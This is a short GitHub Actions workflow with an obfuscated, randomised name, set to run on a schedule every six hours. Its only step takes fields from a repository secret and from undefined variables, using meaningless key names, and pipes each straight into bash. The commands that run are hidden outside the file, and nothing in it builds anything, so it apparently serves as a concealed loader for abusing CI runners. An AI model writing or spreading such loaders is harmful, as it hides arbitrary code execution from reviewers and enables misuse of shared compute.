name: zhoujinwei2345
on:
  workflow_dispatch:
  schedule:
    - cron: '11 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhoujinwei2345
        env:
          r7: ${{ secrets.r7 }}
        run: |
          echo $r7 | jq -r .pt51 | /bin/bash
          echo $hxzh24 | jq -r .bzio8 | /bin/bash
          echo $utcoy752 | jq -r .zgn62806 | /bin/bash
          echo $ou02984 | jq -r .jbckl70797 | /bin/bash

